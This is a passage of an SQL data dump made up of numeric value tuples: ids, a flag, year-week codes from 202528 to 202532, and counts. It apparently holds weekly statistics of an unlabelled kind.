'202528',41),(335,1,'202528',44),(2904,1,'202528',44),(5441,1,'202528',44),(76,1,'202528',51),(89,1,'202528',52),(91,1,'202528',54),(4591,1,'202528',56),(3060,1,'202528',62),(72,1,'202528',78),(68,1,'202528',85),(5502,1,'202528',101),(80,1,'202528',1864),(9,1,'202528',3944),(2293,1,'202529',1),(2748,1,'202529',1),(3297,1,'202529',1),(3764,1,'202529',1),(4404,1,'202529',1),(4797,1,'202529',1),(4866,1,'202529',1),(4878,1,'202529',1),(5080,1,'202529',1),(5292,1,'202529',1),(5326,1,'202529',1),(102,1,'202529',2),(110,1,'202529',2),(478,1,'202529',2),(483,1,'202529',2),(485,1,'202529',2),(488,1,'202529',2),(1594,1,'202529',2),(1600,1,'202529',2),(1602,1,'202529',2),(1776,1,'202529',2),(1780,1,'202529',2),(1782,1,'202529',2),(2159,1,'202529',2),(2309,1,'202529',2),(2457,1,'202529',2),(2751,1,'202529',2),(2956,1,'202529',2),(3006,1,'202529',2),(3092,1,'202529',2),(3096,1,'202529',2),(3104,1,'202529',2),(3229,1,'202529',2),(3240,1,'202529',2),(3245,1,'202529',2),(3247,1,'202529',2),(3249,1,'202529',2),(3253,1,'202529',2),(3257,1,'202529',2),(3263,1,'202529',2),(3265,1,'202529',2),(3269,1,'202529',2),(3271,1,'202529',2),(3307,1,'202529',2),(3430,1,'202529',2),(3486,1,'202529',2),(4357,1,'202529',2),(4382,1,'202529',2),(4396,1,'202529',2),(4408,1,'202529',2),(4416,1,'202529',2),(4444,1,'202529',2),(4457,1,'202529',2),(4674,1,'202529',2),(4741,1,'202529',2),(4759,1,'202529',2),(4765,1,'202529',2),(4771,1,'202529',2),(4858,1,'202529',2),(4874,1,'202529',2),(4897,1,'202529',2),(4977,1,'202529',2),(5033,1,'202529',2),(5122,1,'202529',2),(5128,1,'202529',2),(5137,1,'202529',2),(5146,1,'202529',2),(5304,1,'202529',2),(5330,1,'202529',2),(471,1,'202529',3),(476,1,'202529',3),(477,1,'202529',3),(486,1,'202529',3),(1590,1,'202529',3),(1596,1,'202529',3),(1608,1,'202529',3),(1614,1,'202529',3),(1695,1,'202529',3),(1713,1,'202529',3),(1718,1,'202529',3),(1724,1,'202529',3),(1741,1,'202529',3),(2178,1,'202529',3),(2252,1,'202529',3),(2297,1,'202529',3),(2991,1,'202529',3),(3066,1,'202529',3),(3079,1,'202529',3),(3087,1,'202529',3),(3097,1,'202529',3),(3109,1,'202529',3),(3243,1,'202529',3),(3275,1,'202529',3),(3278,1,'202529',3),(3280,1,'202529',3),(3282,1,'202529',3),(3313,1,'202529',3),(3316,1,'202529',3),(3482,1,'202529',3),(3738,1,'202529',3),(3742,1,'202529',3),(3752,1,'202529',3),(3771,1,'202529',3),(4332,1,'202529',3),(4335,1,'202529',3),(4341,1,'202529',3),(4363,1,'202529',3),(4373,1,'202529',3),(4377,1,'202529',3),(4391,1,'202529',3),(4424,1,'202529',3),(4432,1,'202529',3),(4436,1,'202529',3),(4440,1,'202529',3),(4448,1,'202529',3),(4454,1,'202529',3),(4514,1,'202529',3),(4546,1,'202529',3),(4556,1,'202529',3),(4582,1,'202529',3),(4608,1,'202529',3),(4654,1,'202529',3),(4657,1,'202529',3),(4660,1,'202529',3),(4663,1,'202529',3),(4668,1,'202529',3),(4681,1,'202529',3),(4685,1,'202529',3),(4691,1,'202529',3),(4694,1,'202529',3),(4706,1,'202529',3),(4744,1,'202529',3),(4747,1,'202529',3),(4756,1,'202529',3),(4762,1,'202529',3),(4768,1,'202529',3),(4862,1,'202529',3),(4870,1,'202529',3),(4893,1,'202529',3),(4976,1,'202529',3),(5020,1,'202529',3),(5042,1,'202529',3),(5046,1,'202529',3),(5050,1,'202529',3),(5076,1,'202529',3),(5131,1,'202529',3),(5163,1,'202529',3),(5264,1,'202529',3),(5289,1,'202529',3),(5298,1,'202529',3),(5317,1,'202529',3),(5320,1,'202529',3),(5323,1,'202529',3),(5363,1,'202529',3),(5383,1,'202529',3),(481,1,'202529',4),(482,1,'202529',4),(1720,1,'202529',4),(1726,1,'202529',4),(1734,1,'202529',4),(1737,1,'202529',4),(1739,1,'202529',4),(1747,1,'202529',4),(1751,1,'202529',4),(1772,1,'202529',4),(1778,1,'202529',4),(2152,1,'202529',4),(2558,1,'202529',4),(2804,1,'202529',4),(2809,1,'202529',4),(2993,1,'202529',4),(3034,1,'202529',4),(3041,1,'202529',4),(3045,1,'202529',4),(3069,1,'202529',4),(3072,1,'202529',4),(3107,1,'202529',4),(3290,1,'202529',4),(3489,1,'202529',4),(3714,1,'202529',4),(3746,1,'202529',4),(4338,1,'202529',4),(4412,1,'202529',4),(4517,1,'202529',4),(4566,1,'202529',4),(4688,1,'202529',4),(4700,1,'202529',4),(4709,1,'202529',4),(4722,1,'202529',4),(4750,1,'202529',4),(4792,1,'202529',4),(4802,1,'202529',4),(4883,1,'202529',4),(4888,1,'202529',4),(4988,1,'202529',4),(4996,1,'202529',4),(5024,1,'202529',4),(5028,1,'202529',4),(5071,1,'202529',4),(5134,1,'202529',4),(5248,1,'202529',4),(5256,1,'202529',4),(5271,1,'202529',4),(5295,1,'202529',4),(5307,1,'202529',4),(5310,1,'202529',4),(5314,1,'202529',4),(5334,1,'202529',4),(5374,1,'202529',4),(472,1,'202529',5),(479,1,'202529',5),(480,1,'202529',5),(484,1,'202529',5),(1588,1,'202529',5),(1699,1,'202529',5),(1722,1,'202529',5),(1774,1,'202529',5),(2148,1,'202529',5),(2150,1,'202529',5),(2154,1,'202529',5),(2161,1,'202529',5),(2165,1,'202529',5),(2609,1,'202529',5),(2617,1,'202529',5),(2658,1,'202529',5),(3102,1,'202529',5),(3251,1,'202529',5),(3261,1,'202529',5),(3267,1,'202529',5),(3273,1,'202529',5),(3285,1,'202529',5),(3287,1,'202529',5),(3438,1,'202529',5),(3498,1,'202529',5),(3534,1,'202529',5),(3541,1,'202529',5),(3710,1,'202529',5),(3749,1,'202529',5),(3774,1,'202529',5),(3777,1,'202529',5),(4329,1,'202529',5),(4368,1,'202529',5),(4551,1,'202529',5),(4648,1,'202529',5),(4697,1,'202529',5),(4712,1,'202529',5),(4983,1,'202529',5),(5153,1,'202529',5),(5276,1,'202529',5),(5280,1,'202529',5),(5301,1,'202529',5),(5353,1,'202529',5),(5378,1,'202529',5),(467,1,'202529',6),(469,1,'202529',6),(473,1,'202529',6),(474,1,'202529',6),(1604,1,'202529',6),(1612,1,'202529',6),(1703,1,'202529',6),(1707,1,'202529',6),(1709,1,'202529',6),(1730,1,'202529',6),(1749,1,'202529',6),(2063,1,'202529',6),(2156,1,'202529',6),(2248,1,'202529',6),(2704,1,'202529',6),(2801,1,'202529',6),(2911,1,'202529',6),(2965,1,'202529',6),(2989,1,'202529',6),(3005,1,'202529',6),(3038,1,'202529',6),(3124,1,'202529',6),(3226,1,'202529',6),(3479,1,'202529',6),(3531,1,'202529',6),(3721,1,'202529',6),(3727,1,'202529',6),(3735,1,'202529',6),(4275,1,'202529',6),(4323,1,'202529',6),(4326,1,'202529',6),(4400,1,'202529',6),(4428,1,'202529',6),(4520,1,'202529',6),(4524,1,'202529',6),(4529,1,'202529',6),(4542,1,'202529',6),(4677,1,'202529',6),(4753,1,'202529',6),(4980,1,'202529',6),(5037,1,'202529',6),(5054,1,'202529',6),(5058,1,'202529',6),(5062,1,'202529',6),(5067,1,'202529',6),(5253,1,'202529',6),(5259,1,'202529',6),(1592,1,'202529',7),(1606,1,'202529',7),(1610,1,'202529',7),(1697,1,'202529',7),(1711,1,'202529',7),(1728,1,'202529',7),(1743,1,'202529',7),(1768,1,'202529',7),(1770,1,'202529',7),(2769,1,'202529',7),(2964,1,'202529',7),(3027,1,'202529',7),(3117,1,'202529',7),(3127,1,'202529',7),(3259,1,'202529',7),(3731,1,'202529',7),(4238,1,'202529',7),(4387,1,'202529',7),(4420,1,'202529',7),(4651,1,'202529',7),(4703,1,'202529',7),(5157,1,'202529',7),(5268,1,'202529',7),(5359,1,'202529',7),(5472,1,'202529',7),(74,1,'202529',8),(468,1,'202529',8),(570,1,'202529',8),(1598,1,'202529',8),(1701,1,'202529',8),(1715,1,'202529',8),(1745,1,'202529',8),(1766,1,'202529',8),(3004,1,'202529',8),(3030,1,'202529',8),(3090,1,'202529',8),(4645,1,'202529',8),(5101,1,'202529',8),(5356,1,'202529',8),(5467,1,'202529',8),(487,1,'202529',9),(1584,1,'202529',9),(1732,1,'202529',9),(2775,1,'202529',9),(3023,1,'202529',9),(3724,1,'202529',9),(4301,1,'202529',9),(5425,1,'202529',9),(5433,1,'202529',9),(5461,1,'202529',9),(470,1,'202529',10),(1705,1,'202529',10),(2813,1,'202529',10),(4776,1,'202529',10),(1544,1,'202529',11),(3063,1,'202529',11),(3083,1,'202529',11),(5409,1,'202529',12),(5489,1,'202529',12),(4930,1,'202529',13),(5412,1,'202529',13),(5415,1,'202529',13),(5457,1,'202529',13),(1582,1,'202529',14),(1586,1,'202529',14),(5400,1,'202529',14),(5464,1,'202529',14),(108,1,'202529',15),(84,1,'202529',16),(4612,1,'202529',16),(5492,1,'202529',16),(4587,1,'202529',17),(5397,1,'202529',17),(5420,1,'202529',18),(5428,1,'202529',20),(5436,1,'202529',21),(5449,1,'202529',21),(2503,1,'202529',24),(5406,1,'202529',24),(5441,1,'202529',25),(5454,1,'202529',25),(5140,1,'202529',26),(335,1,'202529',27),(91,1,'202529',28),(5512,1,'202529',29),(89,1,'202529',34),(2904,1,'202529',35),(5515,1,'202529',35),(87,1,'202529',37),(3060,1,'202529',38),(3781,1,'202529',41),(76,1,'202529',43),(5502,1,'202529',53),(72,1,'202529',55),(68,1,'202529',62),(4591,1,'202529',65),(80,1,'202529',2242),(9,1,'202529',4798),(102,1,'202530',1),(106,1,'202530',1),(110,1,'202530',1),(469,1,'202530',1),(480,1,'202530',1),(481,1,'202530',1),(484,1,'202530',1),(486,1,'202530',1),(1724,1,'202530',1),(1739,1,'202530',1),(1772,1,'202530',1),(2148,1,'202530',1),(2150,1,'202530',1),(2152,1,'202530',1),(2156,1,'202530',1),(2161,1,'202530',1),(2248,1,'202530',1),(2252,1,'202530',1),(2609,1,'202530',1),(3030,1,'202530',1),(3072,1,'202530',1),(3090,1,'202530',1),(3124,1,'202530',1),(3240,1,'202530',1),(3243,1,'202530',1),(3245,1,'202530',1),(3247,1,'202530',1),(3257,1,'202530',1),(3271,1,'202530',1),(3275,1,'202530',1),(3280,1,'202530',1),(3285,1,'202530',1),(3541,1,'202530',1),(3710,1,'202530',1),(3774,1,'202530',1),(4326,1,'202530',1),(4338,1,'202530',1),(4373,1,'202530',1),(4404,1,'202530',1),(4408,1,'202530',1),(4412,1,'202530',1),(4424,1,'202530',1),(4436,1,'202530',1),(4448,1,'202530',1),(4520,1,'202530',1),(4551,1,'202530',1),(4685,1,'202530',1),(4691,1,'202530',1),(4722,1,'202530',1),(4759,1,'202530',1),(4797,1,'202530',1),(5046,1,'202530',1),(5050,1,'202530',1),(5067,1,'202530',1),(5298,1,'202530',1),(5323,1,'202530',1),(5334,1,'202530',1),(570,1,'202530',2),(1588,1,'202530',2),(1718,1,'202530',2),(1745,1,'202530',2),(1747,1,'202530',2),(1751,1,'202530',2),(1774,1,'202530',2),(1776,1,'202530',2),(2154,1,'202530',2),(2159,1,'202530',2),(2165,1,'202530',2),(2178,1,'202530',2),(2296,1,'202530',2),(2748,1,'202530',2),(2769,1,'202530',2),(2801,1,'202530',2),(2809,1,'202530',2),(2911,1,'202530',2),(2965,1,'202530',2),(3005,1,'202530',2),(3069,1,'202530',2),(3087,1,'202530',2),(3096,1,'202530',2),(3102,1,'202530',2),(3104,1,'202530',2),(3109,1,'202530',2),(3127,1,'202530',2),(3263,1,'202530',2),(3278,1,'202530',2),(3287,1,'202530',2),(3531,1,'202530',2),(3714,1,'202530',2),(3735,1,'202530',2),(3746,1,'202530',2),(4332,1,'202530',2),(4357,1,'202530',2),(4363,1,'202530',2),(4368,1,'202530',2),(4387,1,'202530',2),(4428,1,'202530',2),(4440,1,'202530',2),(4454,1,'202530',2),(4542,1,'202530',2),(4546,1,'202530',2),(4582,1,'202530',2),(4648,1,'202530',2),(4657,1,'202530',2),(4668,1,'202530',2),(4677,1,'202530',2),(4681,1,'202530',2),(4697,1,'202530',2),(4700,1,'202530',2),(4703,1,'202530',2),(4750,1,'202530',2),(4762,1,'202530',2),(4771,1,'202530',2),(4802,1,'202530',2),(4862,1,'202530',2),(4866,1,'202530',2),(4883,1,'202530',2),(4977,1,'202530',2),(4983,1,'202530',2),(5020,1,'202530',2),(5024,1,'202530',2),(5028,1,'202530',2),(5042,1,'202530',2),(5076,1,'202530',2),(5080,1,'202530',2),(5122,1,'202530',2),(5131,1,'202530',2),(5137,1,'202530',2),(5146,1,'202530',2),(5248,1,'202530',2),(5253,1,'202530',2),(5268,1,'202530',2),(5271,1,'202530',2),(5289,1,'202530',2),(5304,1,'202530',2),(5330,1,'202530',2),(5359,1,'202530',2),(5378,1,'202530',2),(5472,1,'202530',2),(478,1,'202530',3),(479,1,'202530',3),(482,1,'202530',3),(483,1,'202530',3),(485,1,'202530',3),(1584,1,'202530',3),(1590,1,'202530',3),(1594,1,'202530',3),(1604,1,'202530',3),(1697,1,'202530',3),(1711,1,'202530',3),(1713,1,'202530',3),(1720,1,'202530',3),(1730,1,'202530',3),(1743,1,'202530',3),(1749,1,'202530',3),(2309,1,'202530',3),(2457,1,'202530',3),(2558,1,'202530',3),(2658,1,'202530',3),(2751,1,'202530',3),(2804,1,'202530',3),(2956,1,'202530',3),(2964,1,'202530',3),(2991,1,'202530',3),(3027,1,'202530',3),(3041,1,'202530',3),(3045,1,'202530',3),(3097,1,'202530',3),(3226,1,'202530',3),(3229,1,'202530',3),(3261,1,'202530',3),(3267,1,'202530',3),(3269,1,'202530',3),(3297,1,'202530',3),(3313,1,'202530',3),(3479,1,'202530',3),(3482,1,'202530',3),(3489,1,'202530',3),(3721,1,'202530',3),(3738,1,'202530',3),(3749,1,'202530',3),(3752,1,'202530',3),(3764,1,'202530',3),(4323,1,'202530',3),(4335,1,'202530',3),(4377,1,'202530',3),(4396,1,'202530',3),(4400,1,'202530',3),(4432,1,'202530',3),(4514,1,'202530',3),(4517,1,'202530',3),(4524,1,'202530',3),(4566,1,'202530',3),(4612,1,'202530',3),(4660,1,'202530',3),(4688,1,'202530',3),(4706,1,'202530',3),(4709,1,'202530',3),(4712,1,'202530',3),(4741,1,'202530',3),(4747,1,'202530',3),(4753,1,'202530',3),(4765,1,'202530',3),(4792,1,'202530',3),(4858,1,'202530',3),(4870,1,'202530',3),(4874,1,'202530',3),(4878,1,'202530',3),(4897,1,'202530',3),(4988,1,'202530',3),(5033,1,'202530',3),(5037,1,'202530',3),(5071,1,'202530',3),(5101,1,'202530',3),(5153,1,'202530',3),(5264,1,'202530',3),(5276,1,'202530',3),(5292,1,'202530',3),(5307,1,'202530',3),(5310,1,'202530',3),(5314,1,'202530',3),(5320,1,'202530',3),(5326,1,'202530',3),(5353,1,'202530',3),(5383,1,'202530',3),(5467,1,'202530',3),(477,1,'202530',4),(488,1,'202530',4),(1596,1,'202530',4),(1608,1,'202530',4),(1610,1,'202530',4),(1695,1,'202530',4),(1701,1,'202530',4),(1705,1,'202530',4),(1707,1,'202530',4),(1734,1,'202530',4),(1737,1,'202530',4),(2063,1,'202530',4),(2989,1,'202530',4),(3063,1,'202530',4),(3092,1,'202530',4),(3107,1,'202530',4),(3249,1,'202530',4),(3253,1,'202530',4),(3265,1,'202530',4),(3316,1,'202530',4),(3438,1,'202530',4),(3742,1,'202530',4),(3771,1,'202530',4),(3777,1,'202530',4),(4275,1,'202530',4),(4329,1,'202530',4),(4341,1,'202530',4),(4391,1,'202530',4),(4645,1,'202530',4),(4654,1,'202530',4),(4694,1,'202530',4),(4744,1,'202530',4),(4756,1,'202530',4),(4893,1,'202530',4),(4976,1,'202530',4),(4996,1,'202530',4),(5054,1,'202530',4),(5125,1,'202530',4),(5163,1,'202530',4),(5256,1,'202530',4),(5280,1,'202530',4),(5295,1,'202530',4),(472,1,'202530',5),(476,1,'202530',5),(1612,1,'202530',5),(1699,1,'202530',5),(1709,1,'202530',5),(1726,1,'202530',5),(1741,1,'202530',5),(1780,1,'202530',5),(3006,1,'202530',5),(3034,1,'202530',5),(3038,1,'202530',5),(3079,1,'202530',5),(3117,1,'202530',5),(3273,1,'202530',5),(3282,1,'202530',5),(3290,1,'202530',5),(3307,1,'202530',5),(3430,1,'202530',5),(3498,1,'202530',5),(3727,1,'202530',5),(3731,1,'202530',5),(4238,1,'202530',5),(4529,1,'202530',5),(4663,1,'202530',5),(4674,1,'202530',5),(5134,1,'202530',5),(5317,1,'202530',5),(5374,1,'202530',5),(5397,1,'202530',5),(471,1,'202530',6),(1592,1,'202530',6),(1600,1,'202530',6),(1614,1,'202530',6),(1722,1,'202530',6),(1768,1,'202530',6),(1770,1,'202530',6),(1778,1,'202530',6),(1782,1,'202530',6),(2617,1,'202530',6),(2993,1,'202530',6),(3534,1,'202530',6),(4301,1,'202530',6),(4608,1,'202530',6),(4768,1,'202530',6),(4776,1,'202530',6),(4888,1,'202530',6),(5058,1,'202530',6),(5356,1,'202530',6),(5433,1,'202530',6),(1598,1,'202530',7),(1602,1,'202530',7),(1606,1,'202530',7),(1703,1,'202530',7),(1715,1,'202530',7),(2297,1,'202530',7),(3004,1,'202530',7),(3066,1,'202530',7),(3724,1,'202530',7),(4420,1,'202530',7),(4651,1,'202530',7),(5128,1,'202530',7),(5489,1,'202530',7),(1732,1,'202530',8),(2704,1,'202530',8),(3259,1,'202530',8),(4980,1,'202530',8),(5157,1,'202530',8),(5259,1,'202530',8),(5412,1,'202530',8),(5415,1,'202530',8),(5425,1,'202530',8),(467,1,'202530',9),(3251,1,'202530',9),(4556,1,'202530',9),(5301,1,'202530',9),(5363,1,'202530',9),(5464,1,'202530',9),(468,1,'202530',10),(470,1,'202530',10),(1766,1,'202530',10),(3023,1,'202530',10),(4587,1,'202530',10),(74,1,'202530',11),(1728,1,'202530',11),(2813,1,'202530',11),(5062,1,'202530',11),(473,1,'202530',12),(487,1,'202530',12),(1582,1,'202530',12),(2775,1,'202530',12),(5461,1,'202530',12),(3486,1,'202530',13),(5140,1,'202530',13),(5409,1,'202530',13),(5420,1,'202530',13),(1544,1,'202530',15),(5454,1,'202530',15),(84,1,'202530',16),(5400,1,'202530',16),(5428,1,'202530',16),(5492,1,'202530',16),(108,1,'202530',17),(474,1,'202530',17),(3083,1,'202530',17),(4930,1,'202530',18),(1586,1,'202530',19),(5406,1,'202530',19),(5436,1,'202530',19),(5457,1,'202530',19),(5449,1,'202530',20),(5515,1,'202530',20),(5441,1,'202530',23),(3781,1,'202530',27),(91,1,'202530',28),(5502,1,'202530',28),(2503,1,'202530',29),(335,1,'202530',31),(2904,1,'202530',32),(5512,1,'202530',34),(4591,1,'202530',39),(87,1,'202530',40),(89,1,'202530',45),(76,1,'202530',48),(3060,1,'202530',49),(72,1,'202530',59),(68,1,'202530',62),(80,1,'202530',235),(9,1,'202530',2831),(106,1,'202531',2),(2293,1,'202531',2),(2296,1,'202531',2),(102,1,'202531',3),(1697,1,'202531',3),(1705,1,'202531',3),(1707,1,'202531',3),(1720,1,'202531',3),(1751,1,'202531',3),(1772,1,'202531',3),(1782,1,'202531',3),(2063,1,'202531',3),(2150,1,'202531',3),(2152,1,'202531',3),(2159,1,'202531',3),(2165,1,'202531',3),(2178,1,'202531',3),(2248,1,'202531',3),(2252,1,'202531',3),(2609,1,'202531',3),(2989,1,'202531',3),(3006,1,'202531',3),(3072,1,'202531',3),(3107,1,'202531',3),(3247,1,'202531',3),(3273,1,'202531',3),(4387,1,'202531',3),(4546,1,'202531',3),(4551,1,'202531',3),(4759,1,'202531',3),(4792,1,'202531',3),(4797,1,'202531',3),(4802,1,'202531',3),(4862,1,'202531',3),(4874,1,'202531',3),(4878,1,'202531',3),(4897,1,'202531',3),(5050,1,'202531',3),(5248,1,'202531',3),(5323,1,'202531',3),(5374,1,'202531',3),(5378,1,'202531',3),(110,1,'202531',4),(1600,1,'202531',4),(1602,1,'202531',4),(1606,1,'202531',4),(1695,1,'202531',4),(1699,1,'202531',4),(1713,1,'202531',4),(1722,1,'202531',4),(1724,1,'202531',4),(1734,1,'202531',4),(1741,1,'202531',4),(1743,1,'202531',4),(1747,1,'202531',4),(1770,1,'202531',4),(2148,1,'202531',4),(2156,1,'202531',4),(2161,1,'202531',4),(2558,1,'202531',4),(2658,1,'202531',4),(2801,1,'202531',4),(2964,1,'202531',4),(3030,1,'202531',4),(3038,1,'202531',4),(3041,1,'202531',4),(3063,1,'202531',4),(3066,1,'202531',4),(3069,1,'202531',4),(3079,1,'202531',4),(3090,1,'202531',4),(3127,1,'202531',4),(3275,1,'202531',4),(4238,1,'202531',4),(4326,1,'202531',4),(4412,1,'202531',4),(4416,1,'202531',4),(4424,1,'202531',4),(4444,1,'202531',4),(4457,1,'202531',4),(4520,1,'202531',4),(4542,1,'202531',4),(4591,1,'202531',4),(4612,1,'202531',4),(4722,1,'202531',4),(4858,1,'202531',4),(4870,1,'202531',4),(5024,1,'202531',4),(5028,1,'202531',4),(5046,1,'202531',4),(5076,1,'202531',4),(5264,1,'202531',4),(5314,1,'202531',4),(5317,1,'202531',4),(5334,1,'202531',4),(5383,1,'202531',4),(480,1,'202531',5),(1594,1,'202531',5),(1604,1,'202531',5),(1701,1,'202531',5),(1709,1,'202531',5),(1718,1,'202531',5),(1726,1,'202531',5),(1730,1,'202531',5),(1739,1,'202531',5),(1749,1,'202531',5),(1766,1,'202531',5),(1774,1,'202531',5),(1776,1,'202531',5),(2751,1,'202531',5),(2965,1,'202531',5),(2993,1,'202531',5),(3005,1,'202531',5),(3027,1,'202531',5),(3092,1,'202531',5),(3097,1,'202531',5),(3102,1,'202531',5),(3104,1,'202531',5),(3226,1,'202531',5),(3257,1,'202531',5),(3269,1,'202531',5),(3271,1,'202531',5),(3278,1,'202531',5),(3280,1,'202531',5),(3316,1,'202531',5),(3430,1,'202531',5),(3541,1,'202531',5),(3777,1,'202531',5),(4275,1,'202531',5),(4338,1,'202531',5),(4377,1,'202531',5),(4432,1,'202531',5),(4440,1,'202531',5),(4556,1,'202531',5),(4660,1,'202531',5),(4668,1,'202531',5),(4677,1,'202531',5),(4765,1,'202531',5),(4771,1,'202531',5),(4776,1,'202531',5),(4866,1,'202531',5),(4883,1,'202531',5),(4893,1,'202531',5),(4976,1,'202531',5),(4983,1,'202531',5),(4988,1,'202531',5),(5020,1,'202531',5),(5033,1,'202531',5),(5037,1,'202531',5),(5042,1,'202531',5),(5054,1,'202531',5),(5071,1,'202531',5),(5080,1,'202531',5),(5140,1,'202531',5),(5146,1,'202531',5),(5253,1,'202531',5),(5256,1,'202531',5),(5289,1,'202531',5),(5298,1,'202531',5),(5326,1,'202531',5),(5330,1,'202531',5),(5356,1,'202531',5),(5433,1,'202531',5),(5472,1,'202531',5),(478,1,'202531',6),(479,1,'202531',6),(481,1,'202531',6),(483,1,'202531',6),(484,1,'202531',6),(488,1,'202531',6),(570,1,'202531',6),(1584,1,'202531',6),(1588,1,'202531',6),(1590,1,'202531',6),(1592,1,'202531',6),(1608,1,'202531',6),(1612,1,'202531',6),(1711,1,'202531',6),(1737,1,'202531',6),(1745,1,'202531',6),(1780,1,'202531',6),(2154,1,'202531',6),(2309,1,'202531',6),(2457,1,'202531',6),(2617,1,'202531',6),(2748,1,'202531',6),(2769,1,'202531',6),(2991,1,'202531',6),(3004,1,'202531',6),(3045,1,'202531',6),(3096,1,'202531',6),(3117,1,'202531',6),(3240,1,'202531',6),(3253,1,'202531',6),(3263,1,'202531',6),(3265,1,'202531',6),(3267,1,'202531',6),(3282,1,'202531',6),(3285,1,'202531',6),(3287,1,'202531',6),(3307,1,'202531',6),(3531,1,'202531',6),(3534,1,'202531',6),(3710,1,'202531',6),(3727,1,'202531',6),(3735,1,'202531',6),(3738,1,'202531',6),(3752,1,'202531',6),(3764,1,'202531',6),(3771,1,'202531',6),(3774,1,'202531',6),(4323,1,'202531',6),(4332,1,'202531',6),(4341,1,'202531',6),(4357,1,'202531',6),(4363,1,'202531',6),(4382,1,'202531',6),(4391,1,'202531',6),(4396,1,'202531',6),(4408,1,'202531',6),(4436,1,'202531',6),(4454,1,'202531',6),(4514,1,'202531',6),(4529,1,'202531',6),(4587,1,'202531',6),(4608,1,'202531',6),(4648,1,'202531',6),(4657,1,'202531',6),(4674,1,'202531',6),(4681,1,'202531',6),(4691,1,'202531',6),(4694,1,'202531',6),(4706,1,'202531',6),(4709,1,'202531',6),(4744,1,'202531',6),(4768,1,'202531',6),(4888,1,'202531',6),(5058,1,'202531',6),(5067,1,'202531',6),(5101,1,'202531',6),(5122,1,'202531',6),(5134,1,'202531',6),(5137,1,'202531',6),(5157,1,'202531',6),(5163,1,'202531',6),(5268,1,'202531',6),(5271,1,'202531',6),(5301,1,'202531',6),(469,1,'202531',7),(471,1,'202531',7),(472,1,'202531',7),(482,1,'202531',7),(485,1,'202531',7),(486,1,'202531',7),(1596,1,'202531',7),(1598,1,'202531',7),(1610,1,'202531',7),(2775,1,'202531',7),(3034,1,'202531',7),(3087,1,'202531',7),(3109,1,'202531',7),(3124,1,'202531',7),(3229,1,'202531',7),(3245,1,'202531',7),(3249,1,'202531',7),(3259,1,'202531',7),(3313,1,'202531',7),(3479,1,'202531',7),(3482,1,'202531',7),(3486,1,'202531',7),(3714,1,'202531',7),(3721,1,'202531',7),(3746,1,'202531',7),(4329,1,'202531',7),(4368,1,'202531',7),(4404,1,'202531',7),(4428,1,'202531',7),(4448,1,'202531',7),(4517,1,'202531',7),(4566,1,'202531',7),(4582,1,'202531',7),(4645,1,'202531',7),(4654,1,'202531',7),(4685,1,'202531',7),(4688,1,'202531',7),(4697,1,'202531',7),(4700,1,'202531',7),(4712,1,'202531',7),(4747,1,'202531',7),(4750,1,'202531',7),(4762,1,'202531',7),(4996,1,'202531',7),(5131,1,'202531',7),(5153,1,'202531',7),(5292,1,'202531',7),(5295,1,'202531',7),(5353,1,'202531',7),(5359,1,'202531',7),(467,1,'202531',8),(1703,1,'202531',8),(1732,1,'202531',8),(1768,1,'202531',8),(1778,1,'202531',8),(2809,1,'202531',8),(3023,1,'202531',8),(3243,1,'202531',8),(3261,1,'202531',8),(3290,1,'202531',8),(3438,1,'202531',8),(3489,1,'202531',8),(3742,1,'202531',8),(3749,1,'202531',8),(4335,1,'202531',8),(4400,1,'202531',8),(4524,1,'202531',8),(4651,1,'202531',8),(4977,1,'202531',8),(5125,1,'202531',8),(5304,1,'202531',8),(5307,1,'202531',8),(5464,1,'202531',8),(476,1,'202531',9),(477,1,'202531',9),(2297,1,'202531',9),(2911,1,'202531',9),(2956,1,'202531',9),(3251,1,'202531',9),(3731,1,'202531',9),(4301,1,'202531',9),(4373,1,'202531',9),(4420,1,'202531',9),(4663,1,'202531',9),(4703,1,'202531',9),(4741,1,'202531',9),(4753,1,'202531',9),(5062,1,'202531',9),(5128,1,'202531',9),(5276,1,'202531',9),(5310,1,'202531',9),(487,1,'202531',10),(1614,1,'202531',10),(2804,1,'202531',10),(3498,1,'202531',10),(5259,1,'202531',10),(5320,1,'202531',10),(5400,1,'202531',10),(5449,1,'202531',10),(5467,1,'202531',10),(1728,1,'202531',11),(2813,1,'202531',11),(3297,1,'202531',11),(3724,1,'202531',11),(4756,1,'202531',11),(5457,1,'202531',11),(473,1,'202531',12),(2704,1,'202531',12),(3083,1,'202531',12),(4980,1,'202531',12),(1544,1,'202531',13),(1715,1,'202531',13),(5363,1,'202531',13),(5425,1,'202531',13),(470,1,'202531',14),(5397,1,'202531',14),(5412,1,'202531',14),(4930,1,'202531',15),(5428,1,'202531',15),(5441,1,'202531',15),(5461,1,'202531',15),(3060,1,'202531',16),(5409,1,'202531',16),(5415,1,'202531',16),(5489,1,'202531',16),(74,1,'202531',17),(474,1,'202531',17),(5492,1,'202531',17),(84,1,'202531',18),(108,1,'202531',18),(468,1,'202531',18),(5436,1,'202531',18),(5406,1,'202531',19),(1586,1,'202531',20),(5420,1,'202531',21),(5454,1,'202531',23),(3781,1,'202531',24),(2904,1,'202531',25),(2503,1,'202531',27),(5502,1,'202531',27),(5515,1,'202531',28),(5280,1,'202531',29),(1582,1,'202531',30),(91,1,'202531',31),(335,1,'202531',34),(76,1,'202531',36),(5512,1,'202531',36),(87,1,'202531',41),(89,1,'202531',46),(72,1,'202531',65),(68,1,'202531',70),(80,1,'202531',92),(9,1,'202531',2044),(110,1,'202532',1),(1592,1,'202532',1),(3096,1,'202532',2),(3714,1,'202532',2),(4404,1,'202532',2),(106,1,'202532',3),(1596,1,'202532',3),(1602,1,'202532',3),(2991,1,'202532',3),(3097,1,'202532',3),(3280,1,'202532',3),(3287,1,'202532',3),(4238,1,'202532',3),(4591,1,'202532',3),(4668,1,'202532',3),(4674,1,'202532',3),(4691,1,'202532',3),(4762,1,'202532',3),(4878,1,'202532',3),(5134,1,'202532',3),(1697,1,'202532',4),(3092,1,'202532',4),(3104,1,'202532',4),(3107,1,'202532',4),(3109,1,'202532',4),(4387,1,'202532',4),(4391,1,'202532',4),(4663,1,'202532',4),(4744,1,'202532',4),(4870,1,'202532',4),(4980,1,'202532',4),(5028,1,'202532',4),(5080,1,'202532',4),(5256,1,'202532',4),(5326,1,'202532',4),(102,1,'202532',5),(471,1,'202532',5),(1594,1,'202532',5),(1600,1,'202532',5),(2293,1,'202532',5),(2296,1,'202532',5),(2704,1,'202532',5),(2989,1,'202532',5),(3006,1,'202532',5),(3090,1,'202532',5),(3102,1,'202532',5),(3282,1,'202532',5),(4332,1,'202532',5),(4335,1,'202532',5),(4368,1,'202532',5),(4400,1,'202532',5),(44